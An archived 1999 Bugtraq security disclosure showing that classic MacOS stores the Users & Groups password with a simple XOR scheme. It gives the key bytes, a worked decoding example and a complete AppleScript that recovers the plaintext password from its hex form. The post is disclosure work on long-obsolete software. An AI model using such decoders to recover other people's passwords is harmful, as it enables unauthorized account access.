Freaks Macintosh Archive

home *** CD-ROM | disk | FTP | other *** search

/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / •New Files / Decrypt-a-tron / encryption algorithm < prev next >

Wrap

Internet Message Format | 1999-07-19 | 7KB

Date: Sat, 10 Jul 1999 15:28:17 +0200 From: Dawid adix Adamski To: BUGTRAQ@SECURITYFOCUS.COM Subject: MacOS system encryption algorithm The encryption algorithm in MacOS system is simple and the password can be easily decoded. Password is stored in Users & Groups Data File in Preferences folder. Offset is different on each system and depends on Users & Groups configuration, but it always lie after owner's username. It's not so difficult to find it using hex editor, even if we don't know owner's username. Here are some examples of encrypted passwords: 00 04 06 18 0D 0A 19 0B = stayaway 0A 1F 10 1B 00 07 75 1E = yellow 1C 1B 16 14 12 62 10 7B = owner 07 02 13 1A 1E 0F 1A 14 = turnpage 27 25 33 27 27 39 24 7E = Trustno1 AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh where: AA BB CC DD EE FF GG HH - encrypted password (hex) aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex) aa=AA XOR 73H bb=BB XOR AA XOR 70H cc=CC XOR BB XOR 63H dd=DD XOR CC XOR 67H ee=EE XOR DD XOR 74H ff=FF XOR EE XOR 70H gg=GG XOR FF XOR 72H hh=HH XOR GG XOR 6BH An example: Let's take OO 04 06 18 0D 0A 19 0B 00H XOR 73H = 73H = s 04H XOR 00H = 04H; 04H XOR 70H = 74H = t 06H XOR 04H = 02H; O2H XOR 63H = 61H = a 18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y 0DH XOR 18H = 15H; 15H XOR 74H = 61H = a 0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w 19H XOR 0AH = 13H; 13H XOR 72H = 61H = a 0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y tested on: MacOS 7.5.3, 7.5.5, 8.1, 8.5 I wrote an apple script to break passwords --------CUT HERE-------- (* MacOS Pass 2.1 by adix 15.06.99; Apple Script English *) global lbin, bit1, bit2, bitk set hex1 to text returned of (display dialog "Enter encrypted password (hex): " default answer "" buttons {" Ok "} default button " Ok " with icon stop) set Alicia to "0111001101110000011000110110011101110100011100000111001001101011" set pass to "" set lbin to "" set razem to "" set i to 1 set skok to 0 set ile to count items in hex1 if ile = 0 or ile = 1 then set pass to "" else repeat until (i > (ile - 1)) set kodascii to 0 set razem to "" set zn to items (i) thru (i + 1) in hex1 set lbin to hex2bin(zn) repeat with a from 1 to 8 set bit1 to item (a + skok) of Alicia xor(a) set razem to {razem & bitk} as string if i < 2 then set kodascii to {kodascii + bitk * (2 ^ (8 - a))} end if end repeat if i < 2 then set pass to {pass & (ASCII character kodascii)} else set zn to items (i - 2) thru (i - 1) in hex1 set lbin to hex2bin(zn) repeat with a from 1 to 8 set bit1 to item a of razem xor(a) set kodascii to {kodascii + bitk * (2 ^ (8 - a))} end repeat set pass to {pass & (ASCII character kodascii)} end if set skok to skok + 8 set i to i + 2 end repeat end if display dialog "Password: " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok " with icon note on hex2bin(zn) set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", - "1101", "1110", "1111"} set t2hex to "0123456789ABCDEF" set bin to "" repeat with j in zn set t1 to j as string repeat with i from 1 to (count items in t2hex) if ((item i in t2hex) = t1) then set temp to (item i in temphex) exit repeat end if end repeat set bin to {bin & temp} as string end repeat return (bin) end hex2bin on xor(a) set bit2 to item a in lbin if bit1 = bit2 then set bitk to "0" else set bitk to "1" end if end xor --------CUT HERE-------- Dawid adix Adamski adixx@friko4.onet.pl